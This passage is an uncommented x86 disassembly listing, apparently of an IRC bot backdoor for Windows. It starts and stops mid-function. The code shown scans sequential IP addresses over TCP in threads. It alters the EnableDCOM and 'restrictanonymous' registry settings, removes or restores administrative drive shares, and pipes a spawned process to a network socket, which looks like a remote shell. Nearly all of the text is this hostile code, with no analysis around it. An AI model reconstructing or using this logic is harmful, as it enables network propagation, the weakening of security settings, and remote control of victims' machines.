loc_415C0F: ; CODE XREF: _0:00415BCF�j _0:00415BDF�j
mov esi, offset dword_42DDDC
loc_415C14: ; CODE XREF: _0:00415BAF�j _0:00415BB6�j ...
mov edi, [ebp+8]
push esi
push offset dword_4332E4
push 1Ch
push edi
call sub_41782A
xor esi, esi
add esp, 10h
cmp ds:dword_42F5C8, esi
jle short loc_415C58
loc_415C32: ; CODE XREF: _0:00415C56�j
call sub_41730C
push 0Ah
cdq
pop ecx
idiv ecx
push edx
push edi
push offset dword_4332D4
push 1Ch
push edi
call sub_41782A
add esp, 14h
inc esi
cmp esi, ds:dword_42F5C8
jl short loc_415C32
loc_415C58: ; CODE XREF: _0:00415C30�j
mov eax, edi
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C5E proc near ; CODE XREF: sub_415D01+5C�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_424058 ;; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc ; "mIRC"
mov esi, eax
cmp esi, 64h
jbe short loc_415CAD
call ds:dword_43ADA4 ;; FindWindowA
test eax, eax
mov eax, offset dword_4332F8
jnz short loc_415C96
mov eax, offset byte_436EDC
loc_415C96: ; CODE XREF: sub_415C5E+31�j
push eax
push esi
push offset dword_4332F0
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41782A
add esp, 14h
jmp short loc_415CCD
; ---------------------------------------------------------------------------
loc_415CAD: ; CODE XREF: sub_415C5E+22�j
call ds:dword_43ADA4 ;; FindWindowA
test eax, eax
mov eax, offset dword_4332F8
jnz short loc_415CC1
mov eax, offset byte_436EDC
loc_415CC1: ; CODE XREF: sub_415C5E+5C�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_415CCD: ; CODE XREF: sub_415C5E+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_417AB0
pop ecx
cmp eax, 2
pop esi
jbe short loc_415CFC
push 1Ch
lea eax, [ebp+var_1C]
push [ebp+arg_0]
push eax
call sub_418DE0
lea eax, [ebp+var_1C]
push 1Ch
push eax
push [ebp+arg_0]
call sub_418C10
add esp, 18h
loc_415CFC: ; CODE XREF: sub_415C5E+7D�j
mov eax, [ebp+arg_0]
leave
retn
sub_415C5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D01 proc near ; CODE XREF: sub_40EB92+7F�p
; sub_40ECFA+50�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
mov esi, offset dword_43327C
loc_415D0D: ; CODE XREF: sub_415D01+3F�j
cmp [ebp+arg_C], 0
jz short loc_415D28
lea eax, [esi-0Ch]
push eax
push [ebp+arg_C]
call sub_4176D0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_415D32
; ---------------------------------------------------------------------------
loc_415D28: ; CODE XREF: sub_415D01+10�j
mov ecx, [esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_415D32: ; CODE XREF: sub_415D01+25�j
test eax, eax
jnz short loc_415D44
add esi, 14h
inc edi
cmp esi, offset dword_4332E0
jb short loc_415D0D
jmp short loc_415D52
; ---------------------------------------------------------------------------
loc_415D44: ; CODE XREF: sub_415D01+33�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call ds:off_433280[eax*4]
pop ecx
loc_415D52: ; CODE XREF: sub_415D01+41�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_415D65
push [ebp+arg_0]
call sub_415C5E
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_415D65: ; CODE XREF: sub_415D01+57�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_415D01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D6A proc near ; DATA XREF: sub_415E37+7B�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0B8h
mov eax, [ebp+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_B8]
push 1
rep movsd
pop esi
mov [eax+0A4h], esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_34]
call ds:dword_43AD98 ;; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call ds:dword_43AE18 ;; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_415E28
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_43AD40 ;; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov ds:dword_4407FC[ecx], esi
jz short loc_415E28
push [ebp+var_34]
push [ebp+var_28]
call ds:dword_43AE24 ;; inet_ntoa
push eax
mov edi, offset dword_4CD784
push offset unk_4332FC
push edi
call sub_4172B0
push 0
lea eax, [ebp+var_B4]
push [ebp+var_20]
push edi
push eax
push [ebp+var_B8]
call sub_40D679
push edi
call sub_40BF6D
add esp, 28h
loc_415E28: ; CODE XREF: sub_415D6A+5D�j
; sub_415D6A+7E�j
push esi
call ds:dword_43AE30 ;; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_415D6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_415E37 proc near ; DATA XREF: sub_40EE72+35E0�o
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Ah
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_424064
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_415E65: ; CODE XREF: sub_415E37+EC�j
push [ebp+var_2C]
push [ebp+var_20]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_130]
push offset unk_433334
push eax
call sub_4172B0
lea eax, [ebp+var_130]
push 1FFh
push eax
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_4405F0
push eax
call sub_418C10
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_415D6A
push edi
push edi
call ds:dword_4240A0 ;; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_415ED1
loc_415EC6: ; CODE XREF: sub_415E37+98�j
cmp [ebp+var_C], edi
jnz short loc_415ED1
push 32h
call esi ; Sleep
jmp short loc_415EC6
; ---------------------------------------------------------------------------
loc_415ED1: ; CODE XREF: sub_415E37+8D�j
; sub_415E37+92�j
push [ebp+var_4]
call ds:off_424078
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
lea eax, [ebp+var_20]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_417390
add esp, 0Ch
push [ebp+arg_0]
call ds:dword_43ACCC ;; htonl
inc eax
push eax
mov [ebp+arg_0], eax
call ds:dword_43AD94 ;; htonl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_20]
push eax
call sub_417390
add esp, 0Ch
jmp loc_415E65
sub_415E37 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F28 proc near ; DATA XREF: sub_40EE72+5F4F�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_415F6F
call sub_415F88
jmp short loc_415F74
; ---------------------------------------------------------------------------
loc_415F6F: ; CODE XREF: sub_415F28+3E�j
call sub_4162AC
loc_415F74: ; CODE XREF: sub_415F28+45�j
add esp, 10h
push [ebp+var_14]
call sub_417078
pop ecx
push 0
call ds:dword_424054 ;; ExitThread
sub_415F28 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F88 proc near ; CODE XREF: sub_415F28+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp ds:dword_43AE68, edi
jnz loc_4160BA
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_43AE08 ;; RegOpenKeyExA
test eax, eax
jnz short loc_416013
mov ax, ds:word_4336E4
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_43ADBC ;; RegSetValueExA
test eax, eax
jz short loc_415FF5
push offset unk_4336A4
jmp short loc_415FFA
; ---------------------------------------------------------------------------
loc_415FF5: ; CODE XREF: sub_415F88+64�j
push offset dword_433678
loc_415FFA: ; CODE XREF: sub_415F88+6B�j
lea eax, [ebp+var_214]
push eax
call sub_4172B0
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43AD74 ;; RegCloseKey
jmp short loc_416026
; ---------------------------------------------------------------------------
loc_416013: ; CODE XREF: sub_415F88+36�j
lea eax, [ebp+var_214]
push offset unk_433638
push eax
call sub_4172B0
pop ecx
pop ecx
loc_416026: ; CODE XREF: sub_415F88+89�j
cmp [ebp+arg_C], edi
jnz short loc_416045
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416045: ; CODE XREF: sub_415F88+A1�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_43AE08 ;; RegOpenKeyExA
test eax, eax
jnz short loc_4160B3
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call ds:dword_43ADBC ;; RegSetValueExA
test eax, eax
jz short loc_416095
push offset unk_4335D8
jmp short loc_41609A
; ---------------------------------------------------------------------------
loc_416095: ; CODE XREF: sub_415F88+104�j
push offset unk_433594
loc_41609A: ; CODE XREF: sub_415F88+10B�j
lea eax, [ebp+var_214]
push eax
call sub_4172B0
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43AD74 ;; RegCloseKey
jmp short loc_4160CD
; ---------------------------------------------------------------------------
loc_4160B3: ; CODE XREF: sub_415F88+E2�j
push offset unk_433548
jmp short loc_4160BF
; ---------------------------------------------------------------------------
loc_4160BA: ; CODE XREF: sub_415F88+13�j
push offset unk_433508
loc_4160BF: ; CODE XREF: sub_415F88+130�j
lea eax, [ebp+var_214]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_4160CD: ; CODE XREF: sub_415F88+129�j
cmp [ebp+arg_C], edi
jnz short loc_4160EC
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_4160EC: ; CODE XREF: sub_415F88+148�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
cmp ds:dword_43AE90, edi
pop ecx
jnz loc_416267
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41610F: ; CODE XREF: sub_415F88+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call ds:dword_43ACE4
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_4161AC
cmp eax, 0EAh
jz short loc_4161AC
mov esi, offset off_433370
loc_416140: ; CODE XREF: sub_415F88+21D�j
push dword ptr [esi]
push edi
call sub_40DCC3
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_416157
push offset unk_4334D4
jmp short loc_41615C
; ---------------------------------------------------------------------------
loc_416157: ; CODE XREF: sub_415F88+1C6�j
push offset unk_433498
loc_41615C: ; CODE XREF: sub_415F88+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41618F
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41618F: ; CODE XREF: sub_415F88+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
add esi, 8
pop ecx
cmp esi, offset dword_433390
jb short loc_416140
jmp loc_416244
; ---------------------------------------------------------------------------
loc_4161AC: ; CODE XREF: sub_415F88+1AA�j
; sub_415F88+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_41623B
loc_4161BB: ; CODE XREF: sub_415F88+2AF�j
mov edi, [esi]
push edi
call sub_41999C
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_416230
push edi
call sub_40DBB0
push eax
push 0
call sub_40DCC3
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_4161EA
push offset unk_433464
jmp short loc_4161EF
; ---------------------------------------------------------------------------
loc_4161EA: ; CODE XREF: sub_415F88+259�j
push offset unk_433428
loc_4161EF: ; CODE XREF: sub_415F88+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_416223
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416223: ; CODE XREF: sub_415F88+27F�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
pop ecx
loc_416230: ; CODE XREF: sub_415F88+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_4161BB
xor edi, edi
loc_41623B: ; CODE XREF: sub_415F88+22D�j
push [ebp+var_8]
call ds:dword_43AE28
loc_416244: ; CODE XREF: sub_415F88+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41610F
lea eax, [ebp+var_214]
push offset unk_4333F0
push eax
call sub_4172B0
pop ecx
pop ecx
pop ebx
jmp short loc_41627A
; ---------------------------------------------------------------------------
loc_416267: ; CODE XREF: sub_415F88+177�j
lea eax, [ebp+var_214]
push offset unk_4333B0
push eax
call sub_4172B0
pop ecx
pop ecx
loc_41627A: ; CODE XREF: sub_415F88+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_416298
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416298: ; CODE XREF: sub_415F88+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_40BF6D
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_415F88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4162AC proc near ; CODE XREF: sub_415F28:loc_415F6F�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp ds:dword_43AE68, ebx
push esi
jnz loc_4163DA
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call ds:dword_43AE08 ;; RegOpenKeyExA
test eax, eax
jnz short loc_416337
mov ax, ds:word_4338CC
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call ds:dword_43ADBC ;; RegSetValueExA
test eax, eax
jz short loc_416319
push offset unk_433898
jmp short loc_41631E
; ---------------------------------------------------------------------------
loc_416319: ; CODE XREF: sub_4162AC+64�j
push offset dword_43386C
loc_41631E: ; CODE XREF: sub_4162AC+6B�j
lea eax, [ebp+var_220]
push eax
call sub_4172B0
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43AD74 ;; RegCloseKey
jmp short loc_41634A
; ---------------------------------------------------------------------------
loc_416337: ; CODE XREF: sub_4162AC+36�j
lea eax, [ebp+var_220]
push offset unk_433638
push eax
call sub_4172B0
pop ecx
pop ecx
loc_41634A: ; CODE XREF: sub_4162AC+89�j
cmp [ebp+arg_C], ebx
jnz short loc_416369
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416369: ; CODE XREF: sub_4162AC+A1�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call ds:dword_43AE08 ;; RegOpenKeyExA
test eax, eax
jnz short loc_4163D3
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call ds:dword_43ADBC ;; RegSetValueExA
test eax, eax
jz short loc_4163B5
push offset unk_433820
jmp short loc_4163BA
; ---------------------------------------------------------------------------
loc_4163B5: ; CODE XREF: sub_4162AC+100�j
push offset unk_4337DC
loc_4163BA: ; CODE XREF: sub_4162AC+107�j
lea eax, [ebp+var_220]
push eax
call sub_4172B0
pop ecx
pop ecx
push [ebp+var_4]
call ds:dword_43AD74 ;; RegCloseKey
jmp short loc_4163ED
; ---------------------------------------------------------------------------
loc_4163D3: ; CODE XREF: sub_4162AC+E2�j
push offset unk_433790
jmp short loc_4163DF
; ---------------------------------------------------------------------------
loc_4163DA: ; CODE XREF: sub_4162AC+13�j
push offset unk_433508
loc_4163DF: ; CODE XREF: sub_4162AC+12C�j
lea eax, [ebp+var_220]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_4163ED: ; CODE XREF: sub_4162AC+125�j
cmp [ebp+arg_C], ebx
jnz short loc_41640C
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41640C: ; CODE XREF: sub_4162AC+144�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
cmp ds:dword_43AE90, ebx
pop ecx
jnz loc_416581
push edi
mov esi, offset off_433370
mov edi, 200h
loc_416430: ; CODE XREF: sub_4162AC+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_40DC17
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41644B
push offset unk_433760
jmp short loc_416450
; ---------------------------------------------------------------------------
loc_41644B: ; CODE XREF: sub_4162AC+196�j
push offset unk_433728
loc_416450: ; CODE XREF: sub_4162AC+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41647F
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_41647F: ; CODE XREF: sub_4162AC+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
add esi, 8
pop ecx
cmp esi, offset off_433380
jb short loc_416430
call ds:dword_42417C ;; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_416569
loc_4164AA: ; CODE XREF: sub_4162AC+2B7�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_41655E
cmp bl, 41h
jz loc_41655E
movsx esi, bl
push esi
push offset aC_3 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_2 ; "%c:\\"
push 0Ah
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_20]
push eax
call ds:dword_43ADF8 ;; GetDriveTypeA
cmp eax, 3
jnz short loc_41655E
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_40DC17
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41651C
push offset unk_433760
jmp short loc_416521
; ---------------------------------------------------------------------------
loc_41651C: ; CODE XREF: sub_4162AC+267�j
push offset unk_433728
loc_416521: ; CODE XREF: sub_4162AC+26E�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41782A
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_416551
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_416551: ; CODE XREF: sub_4162AC+289�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
pop ecx
loc_41655E: ; CODE XREF: sub_4162AC+206�j
; sub_4162AC+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_4164AA
loc_416569: ; CODE XREF: sub_4162AC+1F8�j
lea eax, [ebp+var_220]
push offset unk_4336E8
push eax
call sub_4172B0
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_416594
; ---------------------------------------------------------------------------
loc_416581: ; CODE XREF: sub_4162AC+173�j
lea eax, [ebp+var_220]
push offset unk_4333B0
push eax
call sub_4172B0
pop ecx
pop ecx
loc_416594: ; CODE XREF: sub_4162AC+2D3�j
cmp [ebp+arg_C], ebx
jnz short loc_4165B2
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40D679
add esp, 14h
loc_4165B2: ; CODE XREF: sub_4162AC+2EB�j
lea eax, [ebp+var_220]
push eax
call sub_40BF6D
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_4162AC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4165C6 proc near ; CODE XREF: sub_415480+1AF�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_416717
imul edi, 234h
mov esi, eax
xor ebx, ebx
mov eax, ds:dword_4407FC[edi]
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
mov edi, ds:dword_4240A0
pop ecx
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_4168E9
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_416631
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_433914
call sub_40BFE1
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
jmp short loc_41666B
; ---------------------------------------------------------------------------
loc_416631: ; CODE XREF: sub_4165C6+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_41699B
lea eax, [ebp+var_C]
push ebx
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_416672
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_433914
call sub_40BFE1
pop ecx
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
push ebx
push dword ptr [esi+14h]
call ds:dword_424168 ;; TerminateThread
loc_41666B: ; CODE XREF: sub_4165C6+69�j
xor eax, eax
jmp loc_416712
; ---------------------------------------------------------------------------
loc_416672: ; CODE XREF: sub_4165C6+82�j
mov eax, [esi+10h]
push 0FFFFFFFFh
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
mov [ebp+var_10], eax
lea eax, [ebp+var_18]
push ebx
push eax
push 3
call ds:dword_424180 ;; WaitForMultipleObjects
sub eax, ebx
jz short loc_4166CC
dec eax
jz short loc_4166C6
dec eax
jz short loc_4166B2
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_4338D0
call sub_40BFE1
pop ecx
pop ecx
jmp short loc_4166E1
; ---------------------------------------------------------------------------
loc_4166B2: ; CODE XREF: sub_4165C6+D5�j
mov edi, ds:dword_424168
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_4166E1
; ---------------------------------------------------------------------------
loc_4166C6: ; CODE XREF: sub_4165C6+D2�j
push ebx
push dword ptr [esi+10h]
jmp short loc_4166D0
; ---------------------------------------------------------------------------
loc_4166CC: ; CODE XREF: sub_4165C6+CF�j
push ebx
push dword ptr [esi+14h]
loc_4166D0: ; CODE XREF: sub_4165C6+104�j
call ds:dword_424168 ;; TerminateThread
push 1
push dword ptr [esi+8]
call ds:dword_424170 ;; TerminateProcess
loc_4166E1: ; CODE XREF: sub_4165C6+EA�j
; sub_4165C6+FE�j
push dword ptr [esi+10h]
mov edi, ds:off_424078
call edi ; sub_4E03D5
push dword ptr [esi+14h]
call edi ; sub_4E03D5
push dword ptr [esi+8]
call edi ; sub_4E03D5
push dword ptr [esi]
call edi ; sub_4E03D5
push dword ptr [esi+4]
call edi ; sub_4E03D5
push dword ptr [esi+0Ch]
call ds:dword_43AE30 ;; closesocket
push esi
call sub_417C3B
pop ecx
push 1
pop eax
loc_416712: ; CODE XREF: sub_4165C6+A7�j
pop edi
pop esi
pop ebx
leave
retn
sub_4165C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416717 proc near ; CODE XREF: sub_4165C6+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_417B89
mov esi, eax
pop ecx
cmp esi, edi
jz loc_416801
mov ebx, ds:dword_424140
lea eax, [ebp+var_14]
push edi
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
mov [esi+4], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call ebx ; CreatePipe
mov edi, ds:off_424078
test eax, eax
jnz short loc_41677A
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_4339F4
jmp short loc_41679A
; ---------------------------------------------------------------------------
loc_41677A: ; CODE XREF: sub_416717+53�j
lea eax, [ebp+var_14]
push 0
push eax
lea eax, [esi+4]
push eax
lea eax, [ebp+var_4]
push eax
call ebx ; CreatePipe
test eax, eax
jnz short loc_4167A2
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_4339A4
loc_41679A: ; CODE XREF: sub_416717+61�j
call sub_40BFE1
pop ecx
jmp short loc_4167D0
; ---------------------------------------------------------------------------
loc_4167A2: ; CODE XREF: sub_416717+75�j
push [ebp+arg_0]
push [ebp+var_8]
push [ebp+var_4]
call sub_416810
add esp, 0Ch
mov [esi+8], eax
push [ebp+var_4]
call edi ; sub_4E03D5
push [ebp+var_8]
call edi ; sub_4E03D5
cmp dword ptr [esi+8], 0
jnz short loc_416805
push offset dword_43396C
call sub_40BF6D
loc_4167D0: ; CODE XREF: sub_416717+89�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_4167DC
push [ebp+var_4]
call edi ; sub_4E03D5
loc_4167DC: ; CODE XREF: sub_416717+BE�j
cmp [ebp+var_8], 0
jz short loc_4167E7
push [ebp+var_8]
call edi ; sub_4E03D5
loc_4167E7: ; CODE XREF: sub_416717+C9�j
mov eax, [esi]
test eax, eax
jz short loc_4167F0
push eax
call edi ; sub_4E03D5
loc_4167F0: ; CODE XREF: sub_416717+D4�j
mov eax, [esi+4]
test eax, eax
jz short loc_4167FA
push eax
call edi ; sub_4E03D5
loc_4167FA: ; CODE XREF: sub_416717+DE�j
push esi
call sub_417C3B
